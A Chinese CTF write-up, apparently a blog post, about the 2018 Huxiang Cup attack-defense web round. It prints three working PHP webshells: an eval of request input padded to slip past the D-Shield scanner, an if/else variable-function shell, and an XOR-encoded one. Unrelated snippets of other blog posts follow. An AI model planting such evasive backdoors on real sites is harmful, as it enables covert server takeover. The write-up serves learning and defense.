湖湘杯2018 WEB AD中的乙個免殺shell

2021-09-02 03:57:19 字數 1102 閱讀 3424

說明

今年湖湘盃賽制挺新穎的,就是運維和題目還有待吐槽,詳見知乎上各位大佬的點評:p萌新這裡只好總結一下web的ad情況

一句話打全場

首先登上去就能看到乙個root許可權的.shell.php,好像要迴圈刪除才能刪掉,但這個好像又會迴圈寫入。。。所以拿著這個.shell.php一直請求全場就行了,,多試幾次,可能之前被刪後面又有了。這個可能是主辦方自己想來管理**的,結果忘刪了?_?

還有就是交flag的地方會卡,我寫了個自動交flag的指令碼就不管了,結果後來才發現有很多次我都沒交上去,少拿了很多分數。

當然更坑的是這裡比賽80支隊伍分了兩個c段,172.16.0.***172.16.1.***,我們只發現了1.***,,,少打了一半隊伍。。。。

免殺的後門

賽後請教p0大佬,發現還有乙個後門,但是我們直接拿d盾掃,卻沒有掃出來,賽後一看,原來是:

<?php$a=

$_request

['a'];

$b=null

;//這一行是關鍵,加了之後就殺不出來,刪去後就能查出來

eval($b

.$a.$b

);//$b兩邊都要有,方可免殺

?>

還真是奇特,可能是d盾有零位元組截斷?_?,學到了,學到了。

之前有大佬報的if else繞過監測,現在也會被d盾報2級威脅。

<?=$a=

$_request[0

];if(

true)$b

=$a;else$b=

"";if(

true)$c

=$_request[1

];else$c=

"";$c(

$b);?>

但那種亦或編碼依然不會被d盾查出來,不過特徵實在太過明顯,手動搜^就行了[笑哭]

$[(

chr(43)

^chr(64

))](

$[(chr(44

)^chr(64)

)]);

2023年的第乙個部落格

為什麼要寫部落格 2016 2017年是乙個收穫的一年。在工作中和平時的學習中,從同事和社群 書中學到了很多知識,一方面是想整理畢業兩年以來學到的知識。另一方面是想和大家分享一下,鍛鍊一下自己,能否自己用最簡單的方式闡述知識,只有講的大家都懂了,自己才是真正的懂了這塊知識。在寫的過程中重新審視自己學...

乙個偽球迷的世界盃記憶

看完了西班牙一比五慘敗給荷蘭的比賽,興奮的無法入睡,我回憶一下我看的歷屆世界盃。我出生在七零年代末的農村,家庭條件還可以,但是爸爸怕我看電視耽誤學習,所以一直到我上 高中,家裡才買了一台電視機。之前的娛樂,主要是聽收音機,看報紙。我爸也不愛體育運動,我身體 也比較瘦弱,所以我從小就沒有運動細胞,體育...

TOMCAT中的乙個問題

這兩天在客戶端部署bo報表系統遇到乙個奇怪問題,tomcat啟動面板打出來的日誌資訊埠號為8181,但我在server.xml檔案裡面已經將埠號改為了8107,但為什麼會是8181呢!真是一頭霧水。用ue在tomcat目錄下所有檔案裡面都搜了一遍字元為 8181 的檔案,但乙個也找不到。這個8181...